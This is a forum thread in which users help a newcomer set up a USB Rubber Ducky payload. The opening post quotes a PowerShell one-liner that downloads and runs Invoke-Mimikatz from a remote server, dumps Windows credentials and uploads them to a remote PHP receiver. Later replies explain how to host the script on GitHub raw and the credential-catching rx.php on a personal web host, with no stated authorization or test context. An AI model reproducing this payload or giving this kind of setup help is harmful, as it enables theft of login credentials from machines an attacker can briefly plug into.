nobama2 Posted March 30, 2017 Posted March 30, 2017 Be patient with me I am a newbie. I am trying to use rubber ducky and the invoke mimikatz powershell script.\ REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I assume download string downloads the file im.ps1 from the http web site (not darrens of coarse) runs it and dumps results in file rx.php and uploads it webserver via http. I set up a webpage on domain.com and tried to upload im.ps1 but could not, told not allowed. Poweshell file. That is wheree I am stuck. Any help appreciated. Quote
ThoughtfulDev Posted March 31, 2017 Posted March 31, 2017 As far as i know you can change the filename from im.ps1 to im.txt and change the script to download the string of the txt since the contant of the im.ps1/.txt is important. Quote
Tw1sT Posted April 2, 2017 Posted April 2, 2017 Sign up for a Github account (if you haven't already) and upload the .ps1 to your Github page. Next click open the "Raw" version of the .ps1 you uploaded. Copy the URL from your browser (should be something like "http://raw.githubusercontent.com/YOUR USERNAME/YOUR REPO/im.ps1") and put that in the DuckyScript use your domain.com page to host the cred receiving php script. Let me know if you need any more help. Quote
mhuggins Posted April 5, 2017 Posted April 5, 2017 Tw1sT you said use your domain.com page to host the cred receiving php script...... how or where do you do that Thanks Quote
ThoughtfulDev Posted April 6, 2017 Posted April 6, 2017 13 hours ago, mhuggins said: Tw1sT you said use your domain.com page to host the cred receiving php script...... how or where do you do that Thanks Just upload the rx.php to your desdired webhost via e.g Filezilla. Quote
mhuggins Posted April 6, 2017 Posted April 6, 2017 7 hours ago, ThoughtfulDev said: Just upload the rx.php to your desdired webhost via e.g Filezilla. ok does it matter where in the file sturcture or just the root of the website directory Quote
ThoughtfulDev Posted April 6, 2017 Posted April 6, 2017 11 minutes ago, mhuggins said: ok does it matter where in the file sturcture or just the root of the website directory it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php. if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php Quote
mhuggins Posted April 6, 2017 Posted April 6, 2017 Just now, ThoughtfulDev said: it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php. if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php thanks ill give it a try Quote
mhuggins Posted April 6, 2017 Posted April 6, 2017 3 minutes ago, ThoughtfulDev said: it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php. if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php one last thing .... what format do i save the rx file. just open notepad paste it then save as ....... php? Quote
ThoughtfulDev Posted April 6, 2017 Posted April 6, 2017 Just now, mhuggins said: one last thing .... what format do i save the rx file. just open notepad paste it then save as ....... php? Yep just save it as a .php file. To me it seems that you need to gain some basic knowledge. Not wanting to be rude or sth ^^ Quote
mhuggins Posted April 6, 2017 Posted April 6, 2017 Just now, ThoughtfulDev said: Yep just save it as a .php file. To me it seems that you need to gain some basic knowledge. Not wanting to be rude or sth ^^ i have it .... just dont want to be wrong. Thanks bud Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.